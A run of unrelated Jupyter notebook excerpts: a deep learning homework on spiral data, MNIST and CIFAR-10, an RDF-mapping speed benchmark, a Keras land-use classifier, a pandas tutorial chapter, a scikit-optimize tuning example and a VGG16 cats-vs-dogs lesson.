1. Change the dataset to be the spiral (bottom-right dataset under "DATA" panel).
2. Increase the noise level to 50 and leave the training and test set ratio unchanged.
3. Train the best model you can, using just `X1` and `X2` as input features. Feel free to add or remove layers and neurons. You can also change learning settings like learning rate, regularization rate, activations and batch size. Try to get the test loss below 0.15.
How many parameters do you have in your models? Describe the model architecture and the training strategy you use. Finally, paste the convergence results below.
* You may need to train the model for enough epochs here and use learning rate scheduling manually
<!---Your answer here.---!>
(c) Use the same dataset as described above with noise level set to 50.
This time, feel free to add additional features or other transformations like `sin(X1)` and `sin(X2)`. Again, try to get the loss below 0.15.
Compare the results with (b) and describe your observation. Describe the model architecture and the training strategy you use. Finally, paste the convergence results below.
<!---Your answer here.---!>
## Q2: Takling MNIST with DNN
In this question, we will explore the behavior of the vanishing gradient problem (which we have tried to solve using feature engineering in Q1) and try to solve it. The dataset we use is the famous MNIST dataset which contains ten different classes of handwritten digits. The MNIST database contains 60,000 training images and 10,000 testing images. In addition, each grayscale image is fit into a 28x28 pixel bounding box.
http://yann.lecun.com/exdb/mnist/
(a) Load the MNIST dataset (you may refer to `keras.datasets.mnist.load_data()`), and split it into a training set (48,000 images), a validation set (12,000 images) and a test set (10,000 images). Make sure to standardize the dataset first.
```
# coding your answer here.
```
(b) Build a sequential model with 30 hidden dense layers (60 neurons each using ReLU as the activation function) plus an output layer (10 neurons using softmax as the activation function). Train it with SGD optimizer with learning rate 0.001 and momentum 0.9 for 10 epochs on MNIST dataset.
Try to manually calculate how many steps are in one epoch and compare it with the one reported by the program. Finally, plot the learning curves (loss vs epochs) and report the accuracy you get on the test set.
```
# coding your answer here.
```
(c) Update the model in (b) to add a BatchNormalization (BN) layer after every hidden layer's activation functions.
How do the training time and the performance compare with (b)? Try to manually calculate how many non-trainable parameters are in your model and compare it with the one reported by the program. Finally, try moving the BN layers before the hidden layers' activation functions and compare the performance with BN layers after the activation function.
```
# coding your answer here.
```
## Q3: High Accuracy CNN for CIFAR-10
When facing problems related to images like Q2, we can consider using CNN instead of DNN. The CIFAR-10 dataset is one of the most widely used datasets for machine learning research. It consists of 60000 32x32 color images in 10 classes, with 6000 images per class. In this problem, we will try to build our own CNN from scratch and achieve the highest possible accuracy on CIFAR-10.
https://www.cs.toronto.edu/~kriz/cifar.html
(a) Load the CIFAR10 dataset (you may refer to `keras.datasets.cifar10.load_data()`), and split it into a training set (40,000 images), a validation set (10,000 images) and a test set (10,000 images). Make sure the pixel values range from 0 to 1.
```
# coding your answer here.
```
(b) Build a Convolutional Neural Network using the following architecture:
| | Type | Maps | Activation |
|--------|---------------------|---------|------------|
| Output | Fully connected | 10 | Softmax |
| S10 | Max Pooling | | |
| B9 | Batch normalization | | |
| C8 | Convolution | 64 | ReLu |
| B7 | Batch normalization | | |
| C6 | Convolution | 64 | ReLu |
| S5 | Max Pooling | | |
| B4 | Batch normalization | | |
| C3 | Convolution | 32 | ReLu |
| B2 | Batch normalization | | |
| C1 | Convolution | 32 | ReLu |
| In | Input | RGB (3) | |
Train the model for 20 epochs with NAdam optimizer (Adam with Nesterov momentum).
Try to manually calculate the number of parameters in your model's architecture and compare it with the one reported by `summary()`. Finally, plot the learning curves and report the accuracy on the test set.
```
# coding your answer here.
```
(c) Looking at the learning curves, you can see that the model is overfitting. Adding data augmentation layer for the model in (a) as follows.
* Applies random horizontal flipping
* Rotates the input images by a random value in the range `[–18 degrees, +18 degrees]`)
* Zooms in or out of the image by a random factor in the range `[-15%, +15%]`
* Randomly choose a location to crop images down to a target size `[30, 30]`
* Randomly adjust the contrast of images so that the resulting images are `[0.9, 1.1]` brighter or darker than the original one.
Fit your model for enough epochs (60, for instance) and compare its performance and learning curves with the previous model in (b). Finally, report the accuracy on the test set.
```
# coding your answer here.
```
(d) Replace all the convolution layers in (b) with depthwise separable convolution layers (except the first convolution layer).
Try to manually calculate the number of parameters in your model's architecture and compare it with the one reported by `summary()`. Fit your model and compare its performance with the previous model in (c). Finally, plot the learning curves and report the accuracy on the test set.
```
# coding your answer here.
```
|
github_jupyter
|
#### The purpose of this notebook is to compare D-REPR with other methods such as KR2RML and R2RML in term of performance
```
import re, numpy as np
import matplotlib.pyplot as plt
from tqdm import tqdm_notebook as tqdm
%matplotlib inline
plt.rcParams["figure.figsize"] = (10.0, 8.0) # set default size of plots
plt.rcParams["image.interpolation"] = "nearest"
plt.rcParams["image.cmap"] = "gray"
%load_ext autoreload
%autoreload 2
%reload_ext autoreload
def read_exec_time(log_file: str, tag_str: str='>>> [DREPR]', print_exec_time: bool=True):
"""Read the executing time of the program"""
with open(log_file, "r") as f:
for line in f:
if line.startswith(">>> [DREPR]"):
m = re.search("((?:\d+\.)?\d+) ?ms", line)
exec_time = m.group(1)
if print_exec_time:
print(line.strip(), "-- extract exec_time:", exec_time)
return float(exec_time)
raise Exception("Doesn't found any output message")
```
#### KR2RML
To setup KR2RML, we need to first download Web-Karma-2.2 from the web, modify the file: `karma-offline/src/main/java/edu/isi/karma/rdf/OfficeRDFGenerator` to add this code to line 184: `System.out.println(">>> [DREPR] Finish converting RDF after " + String.valueOf(System.currentTimeMillis() - l) + "ms");` to print the runtime to stdout.
Then run `mvn install -Dmaven.test.skip=true` at the root directory to install dependencies before actually converting data to RDF
```
%cd /workspace/tools-evaluation/Web-Karma-2.2/karma-offline
DATA_FILE = "/workspace/drepr/drepr/rdrepr/data/insurance.csv"
MODEL_FILE = "/workspace/drepr/drepr/rdrepr/data/insurance.level-0.model.ttl"
OUTPUT_FILE = "/tmp/kr2rml_output.ttl"
karma_exec_times = []
for i in tqdm(range(3)):
!mvn exec:java -Dexec.mainClass="edu.isi.karma.rdf.OfflineRdfGenerator" -Dexec.args=" \
--sourcetype CSV \
--filepath \"{DATA_FILE}\" \
--modelfilepath \"{MODEL_FILE}\" \
--sourcename test \
--outputfile {OUTPUT_FILE}" -Dexec.classpathScope=compile > /tmp/karma_speed_comparison.log
karma_exec_times.append(read_exec_time("/tmp/karma_speed_comparison.log"))
!rm /tmp/karma_speed_comparison.log
print(f"run 3 times, average: {np.mean(karma_exec_times)}ms")
```
<hr />
Report information about the output and input
```
with open(DATA_FILE, "r") as f:
n_records = sum(1 for _ in f) - 1
print("#records:", n_records, f"({round(n_records * 1000 / np.mean(karma_exec_times), 2)} records/s)")
with open(OUTPUT_FILE, "r") as f:
n_triples = sum(1 for line in f if line.strip().endswith("."))
print("#triples:", n_triples, f"({round(n_triples * 1000 / np.mean(karma_exec_times), 2)} triples/s)")
```
#### MorphRDB
Assuming that you have followed their installation guides at [this](https://github.com/oeg-upm/morph-rdb/wiki/Installation) and [usages](https://github.com/oeg-upm/morph-rdb/wiki/Usage#csv-files). We are going to create r2rml mappings and invoke their program to map data into RDF
```
%cd /workspace/tools-evaluation/morph-rdb/morph-examples
!java -cp .:morph-rdb-dist-3.9.17.jar:dependency/\* es.upm.fi.dia.oeg.morph.r2rml.rdb.engine.MorphCSVRunner /workspace/drepr/drepr/rdrepr/data insurance.level-0.morph.properties
```
#### DREPR
```
%cd /workspace/drepr/drepr/rdrepr
DREPR_EXEC_LOG = "/tmp/drepr_exec_log.log"
!cargo run --release > {DREPR_EXEC_LOG}
drepr_exec_times = read_exec_time(DREPR_EXEC_LOG)
!rm {DREPR_EXEC_LOG}
with open("/tmp/drepr_output.ttl", "r") as f:
n_triples = sum(1 for line in f if line.strip().endswith("."))
print("#triples:", n_triples, f"({round(n_triples * 1000 / np.mean(drepr_exec_times), 2)} triples/s)")
```
|
github_jupyter
|
```
#Importing necessary libraries
import keras
import numpy as np
import pandas as pd
from keras.applications import VGG16, inception_v3, resnet50, mobilenet
from keras import models
from keras import layers
from keras import optimizers
from sklearn.metrics import classification_report, confusion_matrix
import matplotlib.pyplot as plt
import os
import glob
import tifffile as tif
from sklearn.preprocessing import OneHotEncoder, LabelEncoder
from tempfile import TemporaryFile
from sklearn import model_selection
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten
from keras.layers import Conv2D, MaxPooling2D
from keras.layers.normalization import BatchNormalization
from keras.preprocessing.image import ImageDataGenerator
from keras.regularizers import l1
# dataset
dataset = []
paths = []
labels = []
input_size = 64
input_size = 64
num_channel = 13
# getting paths of stored images
def read_files(path):
for dirpath, dirnames, filenames in os.walk(path):
#print('Current path: ', dirpath)
#print('Directories: ', dirnames)
#print('Files: ', filenames)
#print(dirpath)
#os.chdir(dirpath)
paths.append(dirpath)
read_files('/home/sachin_sharma/Desktop/exp2_tif')
paths.sort()
paths = paths[1:]
file_names = []
print(paths)
# Converting 13 channel images to np array
def img_array(paths):
print('{}'.format(paths))
os.chdir('{}'.format(paths))
for file in glob.glob("*.tif"):
#print('name of file: '+ file)
file_names.append(file)
x = tif.imread('{}'.format(file))
basename, ext = os.path.splitext(file)
labels.append(basename)
x = np.resize(x, (64, 64, 13))
dataset.append(x)
#calling
for pths in paths:
img_array(pths)
# lets see the shape of random element in a dataset
print(dataset[400].shape)
# Getting the list of max pixel value in each image
""""max_pixel_val = []
def max_pixel(data):
max_pixel_val.append(np.amax(data))
# calling
for data in dataset:
max_pixel(data)"""
"""# max of all pixel values
max_all_pixel_value = max(max_pixel_val)
print('max pixel value from all 13 band images: ',max_all_pixel_value)"""
# Normalizing
"""X_nparray = np.array(dataset).astype(np.float64)
X_mean = np.mean(X_nparray, axis=(0,1,2))
X_std = np.std(X_nparray, axis=(0,1,2))
X_nparray -= X_mean
X_nparray /= X_std
print(X_nparray.shape)
print(X_mean.shape)"""
X_nparray = np.array(dataset)
#print(type(X_mean))
print(X_mean)
#print(X_std)
print(np.mean(X_nparray, axis=(0,1,2)))
#print(np.std(X_nparray, axis=(0,1,2)))
# label encoding
lbl_encoder = LabelEncoder()
ohe = OneHotEncoder()
# assigning labels to each image
labels_1 = []
for l in labels:
labels_1.append(l.split("_")[0])
lbl_list = lbl_encoder.fit_transform(labels_1)
Y = ohe.fit_transform(lbl_list.reshape(-1,1)).toarray().astype(int)
# labels
print(Y[21500])
# splitting the dataset into training set test set
train_data, test_data, train_labels, test_labels = model_selection.train_test_split(X_nparray, Y, test_size = 0.4, random_state = 0)
# Trained data shape
print(train_data.shape)
# test data shape
print(test_data.shape)
# train labels shape
print(train_labels.shape)
# some first 10 hot encodings
print(train_labels[:10])
# test label shape
print(test_labels.shape)
# hyperparameters
batch_size = 50
num_classes = 3
epochs = 20
input_shape = (input_size, input_size, num_channel)
l1_lambda = 0.00003
# model
model = Sequential()
model.add(BatchNormalization(input_shape=input_shape))
model.add(Conv2D(64, (2,2), W_regularizer=l1(l1_lambda), activation='relu'))
model.add(Conv2D(64, (2,2), W_regularizer=l1(l1_lambda), activation='relu'))
model.add(MaxPooling2D(pool_size=(2,2)))
model.add(Dropout(0.3))
model.add(Flatten())
model.add(Dense(512, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(num_classes, activation='softmax'))
model.summary()
opt = keras.optimizers.Adam()
model.compile(loss='categorical_crossentropy', optimizer=opt, metrics=['accuracy'])
# fitting model
history = model.fit(train_data, train_labels,
batch_size=batch_size,
epochs=epochs,
verbose=1,
validation_data=(test_data, test_labels),
)
# saving the model
os.chdir('/home/sachin_sharma/Desktop')
model.save('exp2_c1.h5')
# scores
score = model.evaluate(test_data, test_labels, verbose=0)
print('Test loss:', score[0])
print('Test accuracy:', score[1])
# Confusion Matrix and Classification report
Y_pred = model.predict(test_data)
y_pred = np.argmax(Y_pred, axis=1) # predictions
print('Confusion Matrix')
cm = confusion_matrix(test_labels.argmax(axis=1), y_pred)
#print(cm)
def cm2df(cm, labels):
df = pd.DataFrame()
# rows
for i, row_label in enumerate(labels):
rowdata={}
# columns
for j, col_label in enumerate(labels):
rowdata[col_label]=cm[i,j]
df = df.append(pd.DataFrame.from_dict({row_label:rowdata}, orient='index'))
return df[labels]
df = cm2df(cm, ["Else", "Industrial", "Residential"])
print(df)
# Classification Report
print('Classification Report')
target_names = ['Else','Industrial','Residential']
classificn_report = classification_report(test_labels.argmax(axis=1), y_pred, target_names=target_names)
print(classificn_report)
# Plotting the Loss and Classification Accuracy
model.metrics_names
print(history.history.keys())
# "Accuracy"
plt.plot(history.history['acc'])
plt.plot(history.history['val_acc'])
plt.title('Model Accuracy')
plt.ylabel('Accuracy')
plt.xlabel('Epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.show()
plt.savefig('classifcn.png')
# "Loss"
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('Model loss')
plt.ylabel('Loss')
plt.xlabel('Epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.show()
```
|
github_jupyter
|
# Chapter 1: Pandas Foundations
```
import pandas as pd
import numpy as np
```
## Introduction
## Dissecting the anatomy of a DataFrame
```
pd.set_option('max_columns', 4, 'max_rows', 10)
movies = pd.read_csv('../data/movie.csv')
movies.head()
```
### How it works...
## DataFrame Attributes
### How to do it... {#how-to-do-it-1}
```
movies = pd.read_csv('../data/movie.csv')
columns = movies.columns
index = movies.index
data = movies.values
columns
index
data
type(index)
type(columns)
type(data)
issubclass(pd.RangeIndex, pd.Index)
```
### How it works...
### There's more
```
index.values
columns.values
```
## Understanding data types
### How to do it... {#how-to-do-it-2}
```
movies = pd.read_csv('data/movie.csv')
movies.dtypes
movies.get_dtype_counts()
movies.info()
```
### How it works...
```
pd.Series(['Paul', np.nan, 'George']).dtype
```
### There's more...
### See also
## Selecting a Column
### How to do it... {#how-to-do-it-3}
```
movies = pd.read_csv('data/movie.csv')
movies['director_name']
movies.director_name
movies.loc[:, 'director_name']
movies.iloc[:, 1]
movies['director_name'].index
movies['director_name'].dtype
movies['director_name'].size
movies['director_name'].name
type(movies['director_name'])
movies['director_name'].apply(type).unique()
```
### How it works...
### There's more
### See also
## Calling Series Methods
```
s_attr_methods = set(dir(pd.Series))
len(s_attr_methods)
df_attr_methods = set(dir(pd.DataFrame))
len(df_attr_methods)
len(s_attr_methods & df_attr_methods)
```
### How to do it... {#how-to-do-it-4}
```
movies = pd.read_csv('data/movie.csv')
director = movies['director_name']
fb_likes = movies['actor_1_facebook_likes']
director.dtype
fb_likes.dtype
director.head()
director.sample(n=5, random_state=42)
fb_likes.head()
director.value_counts()
fb_likes.value_counts()
director.size
director.shape
len(director)
director.unique()
director.count()
fb_likes.count()
fb_likes.quantile()
fb_likes.min()
fb_likes.max()
fb_likes.mean()
fb_likes.median()
fb_likes.std()
fb_likes.describe()
director.describe()
fb_likes.quantile(.2)
fb_likes.quantile([.1, .2, .3, .4, .5, .6, .7, .8, .9])
director.isna()
fb_likes_filled = fb_likes.fillna(0)
fb_likes_filled.count()
fb_likes_dropped = fb_likes.dropna()
fb_likes_dropped.size
```
### How it works...
### There's more...
```
director.value_counts(normalize=True)
director.hasnans
director.notna()
```
### See also
## Series Operations
```
5 + 9 # plus operator example. Adds 5 and 9
```
### How to do it... {#how-to-do-it-5}
```
movies = pd.read_csv('data/movie.csv')
imdb_score = movies['imdb_score']
imdb_score
imdb_score + 1
imdb_score * 2.5
imdb_score // 7
imdb_score > 7
director = movies['director_name']
director == 'James Cameron'
```
### How it works...
### There's more...
```
imdb_score.add(1) # imdb_score + 1
imdb_score.gt(7) # imdb_score > 7
```
### See also
## Chaining Series Methods
### How to do it... {#how-to-do-it-6}
```
movies = pd.read_csv('data/movie.csv')
fb_likes = movies['actor_1_facebook_likes']
director = movies['director_name']
director.value_counts().head(3)
fb_likes.isna().sum()
fb_likes.dtype
(fb_likes.fillna(0)
.astype(int)
.head()
)
```
### How it works...
### There's more...
```
(fb_likes.fillna(0)
#.astype(int)
#.head()
)
(fb_likes.fillna(0)
.astype(int)
#.head()
)
fb_likes.isna().mean()
fb_likes.fillna(0) \
.astype(int) \
.head()
def debug_df(df):
print("BEFORE")
print(df)
print("AFTER")
return df
(fb_likes.fillna(0)
.pipe(debug_df)
.astype(int)
.head()
)
intermediate = None
def get_intermediate(df):
global intermediate
intermediate = df
return df
res = (fb_likes.fillna(0)
.pipe(get_intermediate)
.astype(int)
.head()
)
intermediate
```
## Renaming Column Names
### How to do it...
```
movies = pd.read_csv('data/movie.csv')
col_map = {'director_name':'Director Name',
'num_critic_for_reviews': 'Critical Reviews'}
movies.rename(columns=col_map).head()
```
### How it works... {#how-it-works-8}
### There's more {#theres-more-7}
```
idx_map = {'Avatar':'Ratava', 'Spectre': 'Ertceps',
"Pirates of the Caribbean: At World's End": 'POC'}
col_map = {'aspect_ratio': 'aspect',
"movie_facebook_likes": 'fblikes'}
(movies
.set_index('movie_title')
.rename(index=idx_map, columns=col_map)
.head(3)
)
movies = pd.read_csv('data/movie.csv', index_col='movie_title')
ids = movies.index.tolist()
columns = movies.columns.tolist()
```
# rename the row and column labels with list assignments
```
ids[0] = 'Ratava'
ids[1] = 'POC'
ids[2] = 'Ertceps'
columns[1] = 'director'
columns[-2] = 'aspect'
columns[-1] = 'fblikes'
movies.index = ids
movies.columns = columns
movies.head(3)
def to_clean(val):
return val.strip().lower().replace(' ', '_')
movies.rename(columns=to_clean).head(3)
cols = [col.strip().lower().replace(' ', '_')
for col in movies.columns]
movies.columns = cols
movies.head(3)
```
## Creating and Deleting columns
### How to do it... {#how-to-do-it-9}
```
movies = pd.read_csv('data/movie.csv')
movies['has_seen'] = 0
idx_map = {'Avatar':'Ratava', 'Spectre': 'Ertceps',
"Pirates of the Caribbean: At World's End": 'POC'}
col_map = {'aspect_ratio': 'aspect',
"movie_facebook_likes": 'fblikes'}
(movies
.rename(index=idx_map, columns=col_map)
.assign(has_seen=0)
)
total = (movies['actor_1_facebook_likes'] +
movies['actor_2_facebook_likes'] +
movies['actor_3_facebook_likes'] +
movies['director_facebook_likes'])
total.head(5)
cols = ['actor_1_facebook_likes','actor_2_facebook_likes',
'actor_3_facebook_likes','director_facebook_likes']
sum_col = movies[cols].sum(axis='columns')
sum_col.head(5)
movies.assign(total_likes=sum_col).head(5)
def sum_likes(df):
return df[[c for c in df.columns
if 'like' in c]].sum(axis=1)
movies.assign(total_likes=sum_likes).head(5)
(movies
.assign(total_likes=sum_col)
['total_likes']
.isna()
.sum()
)
(movies
.assign(total_likes=total)
['total_likes']
.isna()
.sum()
)
(movies
.assign(total_likes=total.fillna(0))
['total_likes']
.isna()
.sum()
)
def cast_like_gt_actor_director(df):
return df['cast_total_facebook_likes'] >= \
df['total_likes']
df2 = (movies
.assign(total_likes=total,
is_cast_likes_more = cast_like_gt_actor_director)
)
df2['is_cast_likes_more'].all()
df2 = df2.drop(columns='total_likes')
actor_sum = (movies
[[c for c in movies.columns if 'actor_' in c and '_likes' in c]]
.sum(axis='columns')
)
actor_sum.head(5)
movies['cast_total_facebook_likes'] >= actor_sum
movies['cast_total_facebook_likes'].ge(actor_sum)
movies['cast_total_facebook_likes'].ge(actor_sum).all()
pct_like = (actor_sum
.div(movies['cast_total_facebook_likes'])
)
pct_like.describe()
pd.Series(pct_like.values,
index=movies['movie_title'].values).head()
```
### How it works... {#how-it-works-9}
### There's more... {#theres-more-8}
```
profit_index = movies.columns.get_loc('gross') + 1
profit_index
movies.insert(loc=profit_index,
column='profit',
value=movies['gross'] - movies['budget'])
del movies['director_name']
```
### See also
|
github_jupyter
|
```
%matplotlib inline
```
# Tuning a scikit-learn estimator with `skopt`
Gilles Louppe, July 2016
Katie Malone, August 2016
Reformatted by Holger Nahrstaedt 2020
.. currentmodule:: skopt
If you are looking for a :obj:`sklearn.model_selection.GridSearchCV` replacement checkout
`sphx_glr_auto_examples_sklearn-gridsearchcv-replacement.py` instead.
## Problem statement
Tuning the hyper-parameters of a machine learning model is often carried out
using an exhaustive exploration of (a subset of) the space all hyper-parameter
configurations (e.g., using :obj:`sklearn.model_selection.GridSearchCV`), which
often results in a very time consuming operation.
In this notebook, we illustrate how to couple :class:`gp_minimize` with sklearn's
estimators to tune hyper-parameters using sequential model-based optimisation,
hopefully resulting in equivalent or better solutions, but within less
evaluations.
Note: scikit-optimize provides a dedicated interface for estimator tuning via
:class:`BayesSearchCV` class which has a similar interface to those of
:obj:`sklearn.model_selection.GridSearchCV`. This class uses functions of skopt to perform hyperparameter
search efficiently. For example usage of this class, see
`sphx_glr_auto_examples_sklearn-gridsearchcv-replacement.py`
example notebook.
```
print(__doc__)
import numpy as np
```
## Objective
To tune the hyper-parameters of our model we need to define a model,
decide which parameters to optimize, and define the objective function
we want to minimize.
```
from sklearn.datasets import load_boston
from sklearn.ensemble import GradientBoostingRegressor
from sklearn.model_selection import cross_val_score
boston = load_boston()
X, y = boston.data, boston.target
n_features = X.shape[1]
# gradient boosted trees tend to do well on problems like this
reg = GradientBoostingRegressor(n_estimators=50, random_state=0)
```
Next, we need to define the bounds of the dimensions of the search space
we want to explore and pick the objective. In this case the cross-validation
mean absolute error of a gradient boosting regressor over the Boston
dataset, as a function of its hyper-parameters.
```
from skopt.space import Real, Integer
from skopt.utils import use_named_args
# The list of hyper-parameters we want to optimize. For each one we define the
# bounds, the corresponding scikit-learn parameter name, as well as how to
# sample values from that dimension (`'log-uniform'` for the learning rate)
space = [Integer(1, 5, name='max_depth'),
Real(10**-5, 10**0, "log-uniform", name='learning_rate'),
Integer(1, n_features, name='max_features'),
Integer(2, 100, name='min_samples_split'),
Integer(1, 100, name='min_samples_leaf')]
# this decorator allows your objective function to receive a the parameters as
# keyword arguments. This is particularly convenient when you want to set
# scikit-learn estimator parameters
@use_named_args(space)
def objective(**params):
reg.set_params(**params)
return -np.mean(cross_val_score(reg, X, y, cv=5, n_jobs=-1,
scoring="neg_mean_absolute_error"))
```
## Optimize all the things!
With these two pieces, we are now ready for sequential model-based
optimisation. Here we use gaussian process-based optimisation.
```
from skopt import gp_minimize
res_gp = gp_minimize(objective, space, n_calls=50, random_state=0)
"Best score=%.4f" % res_gp.fun
print("""Best parameters:
- max_depth=%d
- learning_rate=%.6f
- max_features=%d
- min_samples_split=%d
- min_samples_leaf=%d""" % (res_gp.x[0], res_gp.x[1],
res_gp.x[2], res_gp.x[3],
res_gp.x[4]))
```
## Convergence plot
```
from skopt.plots import plot_convergence
plot_convergence(res_gp)
```
|
github_jupyter
|
# Using Convolutional Neural Networks
Welcome to the first week of the first deep learning certificate! We're going to use convolutional neural networks (CNNs) to allow our computer to see - something that is only possible thanks to deep learning.
## Introduction to this week's task: 'Dogs vs Cats'
We're going to try to create a model to enter the [Dogs vs Cats](https://www.kaggle.com/c/dogs-vs-cats) competition at Kaggle. There are 25,000 labelled dog and cat photos available for training, and 12,500 in the test set that we have to try to label for this competition. According to the Kaggle web-site, when this competition was launched (end of 2013): *"**State of the art**: The current literature suggests machine classifiers can score above 80% accuracy on this task"*. So if we can beat 80%, then we will be at the cutting edge as of 2013!
## Basic setup
There isn't too much to do to get started - just a few simple configuration steps.
This shows plots in the web page itself - we always wants to use this when using jupyter notebook:
```
%matplotlib inline
```
Define path to data: (It's a good idea to put it in a subdirectory of your notebooks folder, and then exclude that directory from git control by adding it to .gitignore.)
```
pwd
```
You need to download the data to this path...see below for the download link.
```
#path = "data/dogscats/"
# For testing code, not enough data for anything serious
path = "data/dogscats/sample/"
```
A few basic libraries that we'll need for the initial exercises:
```
from __future__ import division, print_function
import os, json
from glob import glob
import numpy as np
np.set_printoptions(precision=4, linewidth=100)
from matplotlib import pyplot as plt
```
We have created a file most imaginatively called 'utils.py' to store any little convenience functions we'll want to use. We will discuss these as we use them.
```
import utils
from utils import plots
```
# Use a pretrained VGG model with our **Vgg16** class
Our first step is simply to use a model that has been fully created for us, which can recognise a wide variety (1,000 categories) of images. We will use 'VGG', which won the 2014 Imagenet competition, and is a very simple model to create and understand. The VGG Imagenet team created both a larger, slower, slightly more accurate model (*VGG 19*) and a smaller, faster model (*VGG 16*). We will be using VGG 16 since the much slower performance of VGG19 is generally not worth the very minor improvement in accuracy.
We have created a python class, *Vgg16*, which makes using the VGG 16 model very straightforward.
## The punchline: state of the art custom model in 7 lines of code
Here's everything you need to do to get >97% accuracy on the Dogs vs Cats dataset - we won't analyze how it works behind the scenes yet, since at this stage we're just going to focus on the minimum necessary to actually do useful work.
```
# As large as you can, but no larger than 64 is recommended.
# If you have an older or cheaper GPU, you'll run out of memory, so will have to decrease this.
batch_size=32
# Import our class, and instantiate
import vgg16
import imp
imp.reload(vgg16)
from vgg16 import Vgg16
```
Download data from http://files.fast.ai/data/ (`dogscats.zip` is the relevant file for this.)
```
vgg = Vgg16()
# Grab a few images at a time for training and validation.
# NB: They must be in subdirectories named based on their category
batches = vgg.get_batches(path+'train', batch_size=batch_size)
val_batches = vgg.get_batches(path+'valid', batch_size=batch_size*2)
vgg.finetune(batches)
vgg.fit(batches, val_batches, nb_epoch=1)
```
I think the low performance compared to official lesson1 notebook is due to remaining Theano vs. Tensorflow incompatible stuff (i.e. it's not using VGG16 exactly). I propose to sidestep this by building a "new" model in Keras+TF using pretrained VGG16 now available in Keras.
The code above will work for any image recognition task, with any number of categories! All you have to do is to put your images into one folder per category, and run the code above.
Let's take a look at how this works, step by step...
## Use Vgg16 for basic image recognition
Let's start off by using the *Vgg16* class to recognise the main imagenet category for each image.
We won't be able to enter the Cats vs Dogs competition with an Imagenet model alone, since 'cat' and 'dog' are not categories in Imagenet - instead each individual breed is a separate category. However, we can use it to see how well it can recognise the images, which is a good first step.
First, create a Vgg16 object:
```
vgg = Vgg16()
```
Vgg16 is built on top of *Keras* (which we will be learning much more about shortly!), a flexible, easy to use deep learning library that sits on top of Theano or Tensorflow. Keras reads groups of images and labels in *batches*, using a fixed directory structure, where images from each category for training must be placed in a separate folder.
Let's grab batches of data from our training folder:
```
batches = vgg.get_batches(path+'train', batch_size=4)
```
(BTW, when Keras refers to 'classes', it doesn't mean python classes - but rather it refers to the categories of the labels, such as 'pug', or 'tabby'.)
*Batches* is just a regular python iterator. Each iteration returns both the images themselves, as well as the labels.
```
imgs,labels = next(batches)
```
As you can see, the labels for each image are an array, containing a 1 in the first position if it's a cat, and in the second position if it's a dog. This approach to encoding categorical variables, where an array containing just a single 1 in the position corresponding to the category, is very common in deep learning. It is called *one hot encoding*.
The arrays contain two elements, because we have two categories (cat, and dog). If we had three categories (e.g. cats, dogs, and kangaroos), then the arrays would each contain two 0's, and one 1.
```
plots(imgs, titles=labels)
```
We can now pass the images to Vgg16's predict() function to get back probabilities, category indexes, and category names for each image's VGG prediction.
```
vgg.predict(imgs, True)
```
The category indexes are based on the ordering of categories used in the VGG model - e.g here are the first four:
```
vgg.classes[:4]
```
(Note that, other than creating the Vgg16 object, none of these steps are necessary to build a model; they are just showing how to use the class to view imagenet predictions.)
## Use our Vgg16 class to finetune a Dogs vs Cats model
To change our model so that it outputs "cat" vs "dog", instead of one of 1,000 very specific categories, we need to use a process called "finetuning". Finetuning looks from the outside to be identical to normal machine learning training - we provide a training set with data and labels to learn from, and a validation set to test against. The model learns a set of parameters based on the data provided.
However, the difference is that we start with a model that is already trained to solve a similar problem. The idea is that many of the parameters should be very similar, or the same, between the existing model, and the model we wish to create. Therefore, we only select a subset of parameters to train, and leave the rest untouched. This happens automatically when we call *fit()* after calling *finetune()*.
We create our batches just like before, and making the validation set available as well. A 'batch' (or *mini-batch* as it is commonly known) is simply a subset of the training data - we use a subset at a time when training or predicting, in order to speed up training, and to avoid running out of memory.
```
batch_size=32
batches = vgg.get_batches(path+'train', batch_size=batch_size)
val_batches = vgg.get_batches(path+'valid', batch_size=batch_size)
```
Calling *finetune()* modifies the model such that it will be trained based on the data in the batches provided - in this case, to predict either 'dog' or 'cat'.
```
vgg.finetune(batches)
```
Finally, we *fit()* the parameters of the model using the training data, reporting the accuracy on the validation set after every epoch. (An *epoch* is one full pass through the training data.)
```
vgg.fit(batches, val_batches, nb_epoch=10)
```
That shows all of the steps involved in using the Vgg16 class to create an image recognition model using whatever labels you are interested in. For instance, this process could classify paintings by style, or leaves by type of disease, or satellite photos by type of crop, and so forth.
Next up, we'll dig one level deeper to see what's going on in the Vgg16 class.
# Create a VGG model from scratch in Keras
For the rest of this tutorial, we will not be using the Vgg16 class at all. Instead, we will recreate from scratch the functionality we just used. This is not necessary if all you want to do is use the existing model - but if you want to create your own models, you'll need to understand these details. It will also help you in the future when you debug any problems with your models, since you'll understand what's going on behind the scenes.
## Model setup
We need to import all the modules we'll be using from numpy, scipy, and keras:
```
from numpy.random import random, permutation
from scipy import misc, ndimage
from scipy.ndimage.interpolation import zoom
import keras
from keras import backend as K
from keras.utils.data_utils import get_file
from keras.models import Sequential, Model
from keras.layers.core import Flatten, Dense, Dropout, Lambda
from keras.layers import Input
from keras.layers.convolutional import Convolution2D, MaxPooling2D, ZeroPadding2D
from keras.optimizers import SGD, RMSprop
from keras.preprocessing import image
```
Let's import the mappings from VGG ids to imagenet category ids and descriptions, for display purposes later.
```
FILES_PATH = 'http://files.fast.ai/models/'; CLASS_FILE='imagenet_class_index.json'
# Keras' get_file() is a handy function that downloads files, and caches them for re-use later
fpath = get_file(CLASS_FILE, FILES_PATH+CLASS_FILE, cache_subdir='models')
with open(fpath) as f: class_dict = json.load(f)
# Convert dictionary with string indexes into an array
classes = [class_dict[str(i)][1] for i in range(len(class_dict))]
```
Here's a few examples of the categories we just imported:
```
classes[:5]
```
## Model creation
Creating the model involves creating the model architecture, and then loading the model weights into that architecture. We will start by defining the basic pieces of the VGG architecture.
VGG has just one type of convolutional block, and one type of fully connected ('dense') block. Here's the convolutional block definition:
```
def ConvBlock(layers, model, filters):
for i in range(layers):
model.add(ZeroPadding2D((1,1)))
model.add(Convolution2D(filters, 3, 3, activation='relu'))
model.add(MaxPooling2D((2,2), strides=(2,2)))
```
...and here's the fully-connected definition.
```
def FCBlock(model):
model.add(Dense(4096, activation='relu'))
model.add(Dropout(0.5))
```
